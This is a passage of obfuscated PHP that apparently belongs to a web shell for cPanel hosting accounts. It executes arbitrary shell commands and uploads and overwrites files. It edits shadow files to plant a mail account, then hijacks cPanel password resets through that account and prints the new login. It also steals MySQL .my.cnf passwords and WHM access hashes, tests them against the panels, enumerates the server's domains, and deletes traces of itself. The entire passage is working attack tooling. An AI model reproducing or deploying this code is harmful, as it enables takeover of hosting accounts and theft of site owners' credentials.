} elseif (function_exists($GLOBALS[ð][0x1d7])) {
ob_start();
@system($bXPN_);
$iXhzk = ob_get_clean();
} elseif (function_exists($GLOBALS[ð][0x1d8])) {
$iXhzk = shell_exec($bXPN_);
} elseif (is_resource($H2CpY = @popen($bXPN_, $GLOBALS[ð][0x1d9]))) {
$iXhzk = $GLOBALS[ð][0x2];
while (!@feof($H2CpY)) {
$iXhzk .= fread($H2CpY, 0x400);
}
pclose($H2CpY);
}
return $iXhzk;
}
function KEOd4($pybzz)
{
$uiCJi = count($pybzz);
$C_4dg = range(0, $uiCJi - 0x1);
shuffle($C_4dg);
$gHYBv = array($uiCJi);
$CYRQV = 0;
foreach ($C_4dg as $Etebm) {
$gHYBv[$CYRQV] = $pybzz[$Etebm];
$CYRQV++;
}
return $gHYBv;
}
function UfeQc($oxb9V)
{
$sXZI3 = $GLOBALS[ð][0x2];
if (function_exists($GLOBALS[ð][0x260])) {
$sXZI3 = file_get_contents($oxb9V);
} elseif (function_exists($GLOBALS[ð][0x261]) && function_exists($GLOBALS[ð][0x262])) {
$sXZI3 = stream_get_contents(fopen($oxb9V, $GLOBALS[ð][0x235]));
} elseif (function_exists($GLOBALS[ð][0x263]) && function_exists($GLOBALS[ð][0x264])) {
$sXZI3 = implode(file($oxb9V));
} elseif (function_exists($GLOBALS[ð][0x265])) {
$LSeh6 = file($oxb9V);
if (function_exists($GLOBALS[ð][0x266])) {
$sXZI3 = implode($LSeh6);
} else {
foreach ($LSeh6 as $Y0TMt) {
$sXZI3 .= $Y0TMt;
}
}
}
if (trim($sXZI3) == $GLOBALS[ð][0x2]) {
$sXZI3 = a7GCN($GLOBALS[ð][0x25f] . $oxb9V);
}
return $sXZI3;
}
function sU59Q($oxb9V, $sD1Ai)
{
if (function_exists($GLOBALS[ð][0x1da])) {
$QhsyF = file_put_contents($oxb9V, $sD1Ai);
} else {
$QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x1db]), $sD1Ai);
}
return $QhsyF;
}
function Pw_dW($rm7Yy, $Lipgx)
{
$uiCJi = 0;
$Wu7is = ufeqC($rm7Yy);
$LSeh6 = explode($GLOBALS[ð][0x1], $Wu7is);
foreach ($LSeh6 as $Y0TMt) {
if (strstr($Y0TMt, $Lipgx)) {
$uiCJi++;
}
}
return $uiCJi;
}
function PdwSI($rm7Yy, $Lipgx)
{
$h73NZ = PW_dw($rm7Yy, $Lipgx);
$Wu7is = UFeqC($rm7Yy);
$LSeh6 = explode($GLOBALS[ð][0x3], $Wu7is);
$JOA3g = $GLOBALS[ð][0x2];
foreach ($LSeh6 as $Y0TMt) {
if (strstr($Y0TMt, $Lipgx) || $h73NZ <= 0) {
$h73NZ--;
if ($h73NZ <= 0) {
$JOA3g .= $Y0TMt . $GLOBALS[ð][0x1];
}
}
}
return $JOA3g;
}
function MiASl($oxb9V, $sD1Ai)
{
if (function_exists($GLOBALS[ð][0x46])) {
$QhsyF = file_put_contents($oxb9V, $sD1Ai, FILE_APPEND);
} else {
$QhsyF = fwrite(fopen($oxb9V, $GLOBALS[ð][0x47]), $sD1Ai);
}
return $QhsyF;
}
function SmVyQ($O2ar5, $YFTnB = null, $wTxJW = null)
{
$wmx5s = curl_init();
curl_setopt($wmx5s, CURLOPT_URL, $O2ar5);
curl_setopt($wmx5s, CURLOPT_HEADER, !0);
curl_setopt($wmx5s, CURLOPT_RETURNTRANSFER, 0x1);
curl_setopt($wmx5s, CURLOPT_HTTPAUTH, CURLAUTH_BASIC);
curl_setopt($wmx5s, CURLOPT_CONNECTTIMEOUT, 0x1e);
curl_setopt($wmx5s, CURLOPT_TIMEOUT, 0x1e);
curl_setopt($wmx5s, CURLOPT_FOLLOWLOCATION, 0x1);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($wmx5s, CURLOPT_SSL_VERIFYHOST, 0);
curl_setopt($wmx5s, CURLOPT_USERAGENT, $_SERVER[$GLOBALS[ð][0x49]]);
curl_setopt($wmx5s, CURLOPT_COOKIEFILE, $GLOBALS[ð][0x48]);
curl_setopt($wmx5s, CURLOPT_COOKIEJAR, $GLOBALS[ð][0x4a]);
if ($YFTnB != null) {
curl_setopt($wmx5s, CURLOPT_HTTPHEADER, $YFTnB);
}
if ($wTxJW != null) {
curl_setopt($wmx5s, CURLOPT_POST, 0x1);
curl_setopt($wmx5s, CURLOPT_POSTFIELDS, $wTxJW);
}
$xM2hz = curl_exec($wmx5s);
curl_close($wmx5s);
return $xM2hz;
}
function fW1yE($W_j2r)
{
$QDTk7 = $GLOBALS[ð][0x2];
global $W6Z5Y;
global $cnKIp;
if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x225]) && function_exists($GLOBALS[ð][0x226])) {
$QDTk7 = file_get_contents($W_j2r, !1, stream_context_create(array($GLOBALS[ð][0x227] => array($GLOBALS[ð][0x228] => $GLOBALS[ð][0x229], $GLOBALS[ð][0x22a] => $GLOBALS[ð][0x22b]))));
file_get_contents($W6Z5Y . $GLOBALS[ð][0x22c], !1, stream_context_create(array($GLOBALS[ð][0x22d] => array($GLOBALS[ð][0x22e] => $GLOBALS[ð][0x22f], $GLOBALS[ð][0x230] => "Sec-Fetch-User: google.com"))));
}
if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x23b])) {
$ituiK = curl_init();
curl_setopt($ituiK, CURLOPT_TIMEOUT, 0xa);
curl_setopt($ituiK, CURLOPT_RETURNTRANSFER, !0);
curl_setopt($ituiK, CURLOPT_URL, $W_j2r);
curl_setopt($ituiK, CURLOPT_USERAGENT, $GLOBALS[ð][0x23d]);
curl_setopt($ituiK, CURLOPT_FOLLOWLOCATION, !0);
if (stristr($W_j2r, $GLOBALS[ð][0x23c])) {
curl_setopt($ituiK, CURLOPT_SSL_VERIFYPEER, 0);
curl_setopt($ituiK, CURLOPT_SSL_VERIFYHOST, 0);
}
curl_setopt($ituiK, CURLOPT_HEADER, !1);
$QDTk7 = curl_exec($ituiK);
curl_close($ituiK);
}
if (trim($QDTk7) == $GLOBALS[ð][0x2]) {
$vuhmp = $GLOBALS[ð][0x240] . substr(str_shuffle($GLOBALS[ð][0x241]), 0x32) . $GLOBALS[ð][0x242];
A7GcN($GLOBALS[ð][0x23e] . $W_j2r . $GLOBALS[ð][0x23f] . $vuhmp);
if (function_exists($GLOBALS[ð][0x243])) {
$QDTk7 = file_get_contents($vuhmp);
} else {
$QDTk7 = stream_get_contents(fopen($vuhmp, $GLOBALS[ð][0x1d9]));
}
unlink($vuhmp);
}
if (trim($QDTk7) == $GLOBALS[ð][0x2] && function_exists($GLOBALS[ð][0x232]) && function_exists($GLOBALS[ð][0x233]) && function_exists($GLOBALS[ð][0x234])) {
$dH1jj = fopen($W_j2r, $GLOBALS[ð][0x235], !1, stream_context_create(array($GLOBALS[ð][0x236] => array($GLOBALS[ð][0x237] => $GLOBALS[ð][0x238], $GLOBALS[ð][0x239] => $GLOBALS[ð][0x23a]))));
$QDTk7 = stream_get_contents($dH1jj);
}
return $QDTk7;
}
function wnEmP()
{
return substr(str_shuffle($GLOBALS[ð][0x198]), 0x19) . substr(str_shuffle($GLOBALS[ð][0x199]), 0x72);
}
function xfT4E($Ez2Fk)
{
$H1vRz = preg_match($GLOBALS[ð][0x1d2], $Ez2Fk);
$bddTm = preg_match($GLOBALS[ð][0x1d3], $Ez2Fk);
$Q8410 = preg_match($GLOBALS[ð][0x1d1], $Ez2Fk);
$eBAYt = preg_match($GLOBALS[ð][0x1d0], $Ez2Fk);
if (!$H1vRz || !$bddTm || !$Q8410 || !$eBAYt) {
return !1;
}
return !0;
}
function cqxAS()
{
$Ez2Fk = wneMp();
$xHzJP = xfT4e($Ez2Fk);
while ($xHzJP == !1) {
$Ez2Fk = wnEMP();
$xHzJP = xFt4e($Ez2Fk);
}
return $Ez2Fk;
}
function r1U2D()
{
global $dr_Lq;
global $t08MP;
global $GEgR8;
global $WnpSY;
global $USGuv;
$eRn5x = str_replace($GLOBALS[ð][0x53], $GLOBALS[ð][0x2], $USGuv);
$c7ie0 = substr($eRn5x, 0, rand(0x3, strlen($eRn5x)));
$sM8Cw = array($GLOBALS[ð][0x1fb], $GLOBALS[ð][0x1fc], $GLOBALS[ð][0x1fd], $GLOBALS[ð][0x1fe], $GLOBALS[ð][0x1ff], $GLOBALS[ð][0x200], $GLOBALS[ð][0x201], $GLOBALS[ð][0x202], $GLOBALS[ð][0x203], $GLOBALS[ð][0x204], $GLOBALS[ð][0x205], $GLOBALS[ð][0x206], $GLOBALS[ð][0x207], $GLOBALS[ð][0x208], $GLOBALS[ð][0x209], $GLOBALS[ð][0x20a], $GLOBALS[ð][0x20b], $GLOBALS[ð][0x20c], $GLOBALS[ð][0x20d], $GLOBALS[ð][0x20e], $GLOBALS[ð][0x20f], $GLOBALS[ð][0x210], $GLOBALS[ð][0x211], $GLOBALS[ð][0x212], $GLOBALS[ð][0x213], $GLOBALS[ð][0x214], $GLOBALS[ð][0x215], $GLOBALS[ð][0x216], $GLOBALS[ð][0x217], $GLOBALS[ð][0x218]);
$GsCRR = array("info{$c7ie0}", "admin{$c7ie0}", "supervisor{$c7ie0}", "administrator{$c7ie0}", "contact{$c7ie0}", "call{$c7ie0}", "mail{$c7ie0}", "email{$c7ie0}", "support{$c7ie0}", "site{$c7ie0}", "website{$c7ie0}", "user{$c7ie0}", "director{$c7ie0}", "manager{$c7ie0}", "chief{$c7ie0}", "executive{$c7ie0}", "leader{$c7ie0}", "supports{$c7ie0}", "backing{$c7ie0}", "prop{$c7ie0}", "backup{$c7ie0}", "shore{$c7ie0}", "upholding{$c7ie0}", "help{$c7ie0}", "back-up{$c7ie0}", "host{$c7ie0}", "hosting{$c7ie0}", "clients{$c7ie0}", "client{$c7ie0}", "member{$c7ie0}");
$QoPM4 = kEOd4($sM8Cw);
$qbUum = keoD4($GsCRR);
array_push($qbUum, substr(str_shuffle($GLOBALS[ð][0x1f8]), 0x20) . $GLOBALS[ð][0x1f9]);
$QMTXX = array_merge($QoPM4, $qbUum);
$QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow";
$uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow";
$t08MP = $GLOBALS[ð][0x2];
if (file_exists($QQ8bf)) {
$t08MP .= UFEqC($QQ8bf);
}
if (file_exists($uU2VV)) {
$t08MP .= UFEQc($uU2VV);
}
foreach ($QMTXX as $stR_2) {
if (!strstr($t08MP, $stR_2 . $GLOBALS[ð][0x7e])) {
break;
}
}
$tLGR8 = CqXas();
$ACEox = crypt($tLGR8, $GLOBALS[ð][0x1ef]);
@mkdir("/home{$GEgR8}{$WnpSY}/etc");
@mkdir("/home{$GEgR8}{$WnpSY}/etc/{$USGuv}");
@mkdir("/home{$GEgR8}{$WnpSY}/mail");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Archive");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Drafts");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Sent");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.spam");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/.Trash");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/cur");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new");
@mkdir("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/tmp");
su59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-acl-list", $GLOBALS[ð][0x2]);
su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidlist", $GLOBALS[ð][0x1f4]);
sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity", $GLOBALS[ð][0x1fa]);
Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot-uidvalidity.5e196afc", $GLOBALS[ð][0x2]);
SU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.index.log", $GLOBALS[ð][0x2]);
sU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.list.index.log", $GLOBALS[ð][0x2]);
Su59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/dovecot.mailbox.log", $GLOBALS[ð][0x2]);
SU59q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/maildirsize", $GLOBALS[ð][0x219]);
sU59Q("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/subscriptions", $GLOBALS[ð][0x1f3]);
$GMTKc = $stR_2 . $GLOBALS[ð][0x7e] . $ACEox . $GLOBALS[ð][0x21a] . $GLOBALS[ð][0x21b];
if (file_exists($uU2VV)) {
$Wu7is = $GLOBALS[ð][0x2];
$t08MP = UFEQC($uU2VV);
if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) {
$Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f2];
}
$Wu7is .= $GMTKc;
$Wu7is .= $t08MP;
SU59q($uU2VV, $Wu7is);
}
if (file_exists($QQ8bf)) {
$Wu7is = $GLOBALS[ð][0x2];
$t08MP = UFeQC($QQ8bf);
if (!strstr($t08MP, $USGuv . $GLOBALS[ð][0x1f0])) {
$Wu7is .= $GLOBALS[ð][0x1f1] . $USGuv . $GLOBALS[ð][0x1f5];
}
$Wu7is .= $GMTKc;
$Wu7is .= $t08MP;
sU59Q($QQ8bf, $Wu7is);
} else {
$Wu7is = $GLOBALS[ð][0x2];
$t08MP = $GLOBALS[ð][0x2];
$Wu7is .= $GLOBALS[ð][0x1f6] . $USGuv . $GLOBALS[ð][0x1f7];
$Wu7is .= $GMTKc;
su59Q($QQ8bf, $Wu7is);
}
$dr_Lq = "{$stR_2}@{$USGuv}|{$tLGR8}";
echo "<smtp><domain>Domian => {$USGuv}</domain><port><br>Port => 587</port><smtpname><br>SMTPname => {$stR_2}</smtpname><password><br>Password => {$tLGR8}</password></smtp><br>\n";
return $stR_2;
}
function Kenwx($WnpSY, $tLGR8)
{
global $e6zLE;
$Sxpg6 = array($GLOBALS[ð][0x89] => $WnpSY, $GLOBALS[ð][0x8a] => $tLGR8, $GLOBALS[ð][0x8b] => $GLOBALS[ð][0x8c]);
$D_ctQ = sMvYq($e6zLE . $GLOBALS[ð][0x8d], null, $Sxpg6);
if (preg_match($GLOBALS[ð][0x86], $D_ctQ) || preg_match($GLOBALS[ð][0x87], $D_ctQ) || preg_match($GLOBALS[ð][0x88], $D_ctQ)) {
return !0;
}
return !1;
}
function aUM2F()
{
global $USGuv;
global $WnpSY;
global $GEgR8;
if (uFEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) {
$EKHbT = UFEQc("/home{$GEgR8}{$WnpSY}/.my.cnf");
preg_match($GLOBALS[ð][0x1b9], $EKHbT, $QObCn);
preg_match($GLOBALS[ð][0x1b8], $EKHbT, $jPaTv);
if (preg_match($GLOBALS[ð][0x1b7], $EKHbT)) {
if (!empty($QObCn[0x1])) {
$kLoFX = $QObCn[0x1];
} elseif (!empty($jPaTv[0x1])) {
$kLoFX = $jPaTv[0x1];
}
if (isset($kLoFX)) {
if (kenwX($WnpSY, $kLoFX) == !0) {
echo "\n<br><cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kLoFX}</cpanel>";
}
}
}
}
}
function rrMp2($my6fw)
{
global $WnpSY;
global $GEgR8;
global $e6zLE;
global $t08MP;
SU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw);
su59q("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo", $GLOBALS[ð][0x2f] . $my6fw);
$DInZ0 = array($GLOBALS[ð][0x3b] => $WnpSY, $GLOBALS[ð][0x3c] => $GLOBALS[ð][0x3d]);
$D_ctQ = sMvYQ("{$e6zLE}/resetpass", null, $DInZ0);
if (preg_match($GLOBALS[ð][0x30], $D_ctQ)) {
if (isset($t08MP)) {
f6uQd();
}
aum2f();
unlink($GLOBALS[ð][0x32]);
die($GLOBALS[ð][0x31]);
}
$IQVSV = array($GLOBALS[ð][0x33] => $GLOBALS[ð][0x34], $GLOBALS[ð][0x35] => $WnpSY, $GLOBALS[ð][0x36] => $my6fw, $GLOBALS[ð][0x37] => $GLOBALS[ð][0x2], $GLOBALS[ð][0x38] => $my6fw, $GLOBALS[ð][0x39] => $GLOBALS[ð][0x3a]);
$BZKHp = smvYQ("{$e6zLE}/resetpass", null, $IQVSV);
if (preg_match($GLOBALS[ð][0x3e], $BZKHp)) {
unlink("/home{$GEgR8}{$WnpSY}/.contactemail");
unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo");
sU59q("/home{$GEgR8}{$WnpSY}/.contactemail", $my6fw);
chmod("/home{$GEgR8}{$WnpSY}/.contactemail", 0600);
$BZKHp = sMvYq("{$e6zLE}/resetpass", null, $IQVSV);
}
if (preg_match($GLOBALS[ð][0x2e], $BZKHp)) {
return !1;
}
return !0;
}
function i7GRf($e20Gs)
{
sleep(0x7);
$Z3hyF = 0;
$M34yy = scandir($e20Gs);
foreach ($M34yy as $FcCNX) {
if ($FcCNX != $GLOBALS[ð][0xd1] && $FcCNX != $GLOBALS[ð][0xd2] && $FcCNX != $GLOBALS[ð][0xd3]) {
$Z3hyF++;
$DBsEl = ufeQC($e20Gs . $GLOBALS[ð][0x85] . $FcCNX);
if (preg_match($GLOBALS[ð][0xd4], $DBsEl, $bjkID)) {
$SSP9u = $bjkID[0x1];
}
}
}
if (empty($SSP9u) && $Z3hyF > 0) {
global $dr_Lq;
global $IyBvl;
$dr_Lq = explode($GLOBALS[ð][0xc0], $dr_Lq);
$my6fw = $dr_Lq[0];
$tLGR8 = $dr_Lq[0x1];
$Bbpdj = array($GLOBALS[ð][0xcd] => $my6fw, $GLOBALS[ð][0xce] => $tLGR8, $GLOBALS[ð][0xcf] => $GLOBALS[ð][0xd0]);
$nAXqQ = sMVyq("{$IyBvl}/login/", null, $Bbpdj);
if (preg_match($GLOBALS[ð][0xc1], $nAXqQ)) {
if (preg_match($GLOBALS[ð][0xc2], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc3], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc4], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc5], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc6], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc7], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} elseif (preg_match($GLOBALS[ð][0xc8], $nAXqQ, $MqnST)) {
$MqnST = $MqnST[0x1];
} else {
aUM2F();
f6uqd();
unlink($GLOBALS[ð][0xca]);
die($GLOBALS[ð][0xc9]);
}
$UwF6G = SMvYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/");
$dVuXE = smVYQ("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=1&_action=show");
if (preg_match($GLOBALS[ð][0xcb], $dVuXE, $bjkID)) {
$SSP9u = $bjkID[0x1];
} else {
$dVuXE = SMVYq("{$IyBvl}/{$MqnST}/3rdparty/roundcube/?_uid=2&_action=show");
if (preg_match($GLOBALS[ð][0xcc], $dVuXE, $bjkID)) {
$SSP9u = $bjkID[0x1];
}
}
}
}
if (empty($SSP9u)) {
AUM2f();
f6Uqd();
unlink($GLOBALS[ð][0xd6]);
die($GLOBALS[ð][0xd5]);
}
return $SSP9u;
}
function Gh_rF($e20Gs = null)
{
global $WnpSY;
global $USGuv;
global $e6zLE;
if ($e20Gs == null) {
$SSP9u = trim($_POST[$GLOBALS[ð][0xbf]]);
} else {
$SSP9u = i7gRF($e20Gs);
}
$PJswN = array($GLOBALS[ð][0xb1] => $WnpSY, $GLOBALS[ð][0xb2] => $GLOBALS[ð][0xb3], $GLOBALS[ð][0xb4] => $GLOBALS[ð][0x2], $GLOBALS[ð][0xb5] => $SSP9u);
$DZZzM = SmVyq("{$e6zLE}/resetpass", null, $PJswN);
$kpaoN = cQXaS();
$su69k = array($GLOBALS[ð][0xb6] => $GLOBALS[ð][0xb7], $GLOBALS[ð][0xb8] => $WnpSY, $GLOBALS[ð][0xb9] => $kpaoN, $GLOBALS[ð][0xba] => $GLOBALS[ð][0xbb], $GLOBALS[ð][0xbc] => $GLOBALS[ð][0xbd], $GLOBALS[ð][0xbe] => $kpaoN);
$gZVpq = SMvyq("{$e6zLE}/resetpass", null, $su69k);
echo "<cpanel>https://{$USGuv}:2083|{$WnpSY}|{$kpaoN}</cpanel><br>\n";
}
function j91UX($stR_2 = null)
{
global $GEgR8;
global $WnpSY;
global $USGuv;
if (isset($_POST[$GLOBALS[ð][0x28]])) {
rrMp2(trim($_POST[$GLOBALS[ð][0x29]]));
exit(0);
} elseif (isset($_POST[$GLOBALS[ð][0x2a]])) {
gh_Rf();
unlink("/home{$GEgR8}{$WnpSY}/.contactemail");
unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo");
unlink($GLOBALS[ð][0x2b]);
exit(0);
}
if (rrmp2("{$stR_2}@{$USGuv}") == !1) {
aum2f();
f6Uqd();
unlink($GLOBALS[ð][0x2c]);
die($GLOBALS[ð][0x2d]);
}
Gh_rf("/home{$GEgR8}{$WnpSY}/mail/{$USGuv}/{$stR_2}/new");
f6UqD();
}
function F6UQd()
{
global $t08MP;
global $GEgR8;
global $WnpSY;
global $USGuv;
$QQ8bf = "/home{$GEgR8}{$WnpSY}/etc/{$USGuv}/shadow";
$uU2VV = "/home{$GEgR8}{$WnpSY}/etc/shadow";
sU59q($QQ8bf, $t08MP);
Su59Q($uU2VV, $t08MP);
chmod($QQ8bf, 0640);
chmod($uU2VV, 0640);
unlink("/home{$GEgR8}{$WnpSY}/.contactemail");
unlink("/home{$GEgR8}{$WnpSY}/.cpanel/contactinfo");
}
function UhztB($jpODZ)
{
global $FDWty;
if (isset($_POST[$GLOBALS[ð][0x267]])) {
rename(trim($_POST[$GLOBALS[ð][0x268]]), trim($_POST[$GLOBALS[ð][0x269]]));
$i83r4 = trim($_POST[$GLOBALS[ð][0x26b]]);
$cHB_F = PDWSI($i83r4, $GLOBALS[ð][0x26a]);
chmod($i83r4, 0644);
su59Q($i83r4, $cHB_F);
exit;
}
$AX0EH = $_FILES[$GLOBALS[ð][0x265]][$GLOBALS[ð][0x274]];
if ($jpODZ == 0x1) {
$u3Q11 = $FDWty . $_FILES[$GLOBALS[ð][0x26d]][$GLOBALS[ð][0x26e]];
} elseif ($jpODZ == 0x2) {
$ya3mT = substr(str_shuffle($GLOBALS[ð][0x26f]), 0x2d);
mkdir($ya3mT);
sU59Q($ya3mT . $GLOBALS[ð][0x270], $GLOBALS[ð][0x271]);
$u3Q11 = $ya3mT . $GLOBALS[ð][0x105] . $_FILES[$GLOBALS[ð][0x264]][$GLOBALS[ð][0x26e]];
} else {
$u3Q11 = $_FILES[$GLOBALS[ð][0x272]][$GLOBALS[ð][0x273]];
}
$kUkI7 = move_uploaded_file($AX0EH, $u3Q11);
if (!$kUkI7) {
$kUkI7 = copy($AX0EH, $u3Q11);
}
if ($kUkI7) {
echo "<successfully>Uploaded successfully.</successfully>";
if ($jpODZ == 0x2) {
echo "<br><folder>{$ya3mT}</folder>";
}
}
}
function Wc4SH()
{
global $FDWty;
$Etebm = $_POST[$GLOBALS[ð][0x21f]];
$CFDzr = 0;
$Z0beW = array($FDWty . $GLOBALS[ð][0x21c], $FDWty . $GLOBALS[ð][0x21d], $FDWty . $GLOBALS[ð][0x21e]);
foreach ($Z0beW as $oxb9V) {
if (file_exists($oxb9V)) {
$QCGIr = Su59q($oxb9V, $Etebm);
if (!$QCGIr) {
unlink($oxb9V);
Su59q($oxb9V, $Etebm);
}
$CFDzr = 0x1;
}
}
if ($CFDzr == 0) {
foreach ($Z0beW as $oxb9V) {
sU59q($oxb9V, $Etebm);
}
}
echo "./Done";
}
function ZX3AV($WnpSY, $vfUVq)
{
global $hEUZd;
$vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq);
$VmjkA = array("Authorization:WHM {$WnpSY}:{$vfUVq}");
$D_ctQ = SMvyQ($hEUZd . $GLOBALS[ð][0x90], $VmjkA, null);
if (preg_match($GLOBALS[ð][0x8e], $D_ctQ) || preg_match($GLOBALS[ð][0x8f], $D_ctQ)) {
return !0;
}
return !1;
}
function rsq3X()
{
global $WnpSY;
global $GEgR8;
if (uFEQc($GLOBALS[ð][0x244])) {
$ILX08 = uFeqc($GLOBALS[ð][0x245]);
$ILX08 = explode($GLOBALS[ð][0x1], trim($ILX08));
foreach ($ILX08 as $MocnV) {
$c7ie0 = explode($GLOBALS[ð][0x7e], $MocnV);
$c7ie0 = $c7ie0[0];
if (uFeqc("/home{$GEgR8}{$c7ie0}/.accesshash")) {
$vfUVq = UFEQc("/home{$GEgR8}{$c7ie0}/.accesshash");
$vfUVq = str_replace($GLOBALS[ð][0x3], $GLOBALS[ð][0x2], $vfUVq);
if (ZX3aV($c7ie0, $vfUVq) == !0) {
echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n";
}
}
}
}
if (UFeQc("/home{$GEgR8}{$WnpSY}/.accesshash")) {
$vfUVq = ufEqc("/home{$GEgR8}{$WnpSY}/.accesshash");
$vfUVq = str_replace($GLOBALS[ð][0x1], $GLOBALS[ð][0x2], $vfUVq);
if (ZX3av($WnpSY, $vfUVq) == !0) {
echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n";
}
} else {
unlink("/home{$GEgR8}{$WnpSY}/.accesshash");
$LUpGY = substr(str_shuffle($GLOBALS[ð][0x248]), 0x3);
Su59Q("/home{$GEgR8}{$WnpSY}/.accesshash", $LUpGY);
chmod("/home{$GEgR8}{$WnpSY}/.accesshash", 0600);
if (Zx3av($WnpSY, $vfUVq) == !0) {
echo "<font color=\"green\"><center>[+] Accesshash </center> </font><br>\\n";
} else {
unlink("/home{$GEgR8}{$WnpSY}/.accesshash");
}
}
}
function SWRgg()
{
global $WnpSY;
global $GEgR8;
if (UFEQc($GLOBALS[ð][0x4e])) {
$MULSm = Ufeqc($GLOBALS[ð][0x51]);
$MULSm = explode($GLOBALS[ð][0x3], trim($MULSm));
foreach ($MULSm as $MocnV) {
$c7ie0 = explode($GLOBALS[ð][0x4f], $MocnV);
$c7ie0 = $c7ie0[0];
if (UFeqc("/home{$GEgR8}{$c7ie0}/.my.cnf")) {
echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>";
}
}
} elseif (UfEQC("/home{$GEgR8}{$WnpSY}/.my.cnf")) {
echo "<font color=\"green\"><center>[+] mycnf </center> </font><br>";
}
}
function UgUZa()
{
global $XG7BU;
$kX5Kz = $GLOBALS[ð][0x4b] . $XG7BU;
$aMb4b = fW1Ye($kX5Kz);
$hs4Qn = json_decode($aMb4b)->{$GLOBALS[ð][0x4d]};
$Qczmw = json_decode($aMb4b)->{$GLOBALS[ð][0x4c]};
return array($hs4Qn, $Qczmw);
}
function YdVh6($jpODZ)
{
global $ACEox;
global $GEgR8;
global $WnpSY;
global $XG7BU;
global $USGuv;
$Z3hyF = 0;
echo "<ip>{$XG7BU}</ip>";
if (is_dir("/home{$GEgR8}{$WnpSY}/.cpanel")) {
$rm7Yy = uFEqC($GLOBALS[ð][0x221]);
if (!$rm7Yy) {
echo "<error># can't ReaD -> [ /etc/named.conf ]</error>";
}
preg_match_all($GLOBALS[ð][0x223], $rm7Yy, $zXPiY);
$AnvGa = array_unique($zXPiY[0x1]);
foreach ($AnvGa as $eRn5x) {
$Z3hyF++;
if ($jpODZ == 0x1) {
echo "{$eRn5x}\n";
}
}
} elseif (preg_match("/{$USGuv}/", $ACEox)) {
preg_match("#/(.*)\\/{$USGuv}/#", $ACEox, $SrYD9);
$SrYD9 = $GLOBALS[ð][0x85] . $SrYD9[0x1];
$AnvGa = a7gCn("ls {$SrYD9} | grep '\\.'");
$hWl0Q = explode($GLOBALS[ð][0x3], $AnvGa);
foreach ($hWl0Q as $eRn5x) {
if (is_file($SrYD9 . $GLOBALS[ð][0x85] . $eRn5x)) {
continue;
}
$Z3hyF++;
if ($jpODZ == 0x1) {
echo "{$eRn5x}\n";
}
}
if (!$AnvGa) {
$AnvGa = scandir($SrYD9);
foreach ($AnvGa as $eRn5x) {
if (is_file($SrYD9 . $GLOBALS[ð][0x105] . $eRn5x) || !strstr($eRn5x, $GLOBALS[ð][0xd1])) {
continue;
}
$Z3hyF++;
if ($jpODZ == 0x1) {
echo "{$eRn5x}\n";
}
}
}
} else {
echo "<error>can't get domains.</error>";
}
return $Z3hyF;
}
function U0TK3()
{
global $x3Uog;
global $ACEox;
global $GEgR8;
global $WnpSY;
global $USGuv;
global $XG7BU;
$GYhUj = uGuZA();
echo $GLOBALS[ð][0x60] . phpversion() . $GLOBALS[ð][0x61];
echo $GLOBALS[ð][0x6d] . $USGuv . $GLOBALS[ð][0x6e];
